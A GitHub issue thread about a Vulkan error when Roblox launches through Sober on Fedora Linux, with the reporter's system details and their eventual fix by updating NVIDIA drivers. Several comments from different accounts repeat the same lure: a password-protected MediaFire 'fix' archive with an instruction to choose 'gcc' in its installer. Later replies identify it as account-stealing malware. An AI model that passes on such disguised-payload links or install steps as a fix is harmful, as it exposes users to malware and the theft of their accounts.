### ISSUE TITLE
Vulkan error during Roblox startup

### ISSUE THREAD

**Issue by BlyGuy** [vinegarhq/sober#171]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

After installing the application succesfully, I am unable to launch Roblox due to a Vulkan Error:

```
[FLog::Graphics] Vulkan: creating framebuffer 800x600
[FLog::Graphics] VULKAN ERROR: vkGetPhysicalDeviceSurfacePresentModesKHR(physicalDevice, wd.presentationSurface, &modeCount, nullptr) returned -13 (Unhandled error)
```

The full log-file can be found in [here](https://github.com/user-attachments/files/16763033/log.txt)

I checked if this was due to outdated/bad graphics drivers, but my search was inconclusive and I only encounter this bug in this application.

## (Possibly) Relevant System info:
* OS: Fedora Linux 40 (KDE Plasma) x86_64
* Kernel: 6.10.6-200.fc40.x86_64
* Session: Wayland
* Resolution: 1920x1080 **and** 1600x900 (two monitors)
* Integrated GPU: AMD ATI Radeon Vega Series / Radeon Vega Mobile Series
* Dedicated  GPU: NVIDIA GeForce RTX 3050 Mobile

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HarbingerOfFire** [comment]
> Download https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file password: changeme In the installer menu, select "gcc."

Check your signed in sessions for unknown people

**Comment by caineblood** [comment]
that is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by BlyGuy** [comment]
FIXED: The issue happened to be due to outdated drivers
After installing the newest nvidia-drivers from rpm-fusion repo (version 3:560.35.03-3.fc40) this error doesn't occur anymore.
I will remove the issue now.
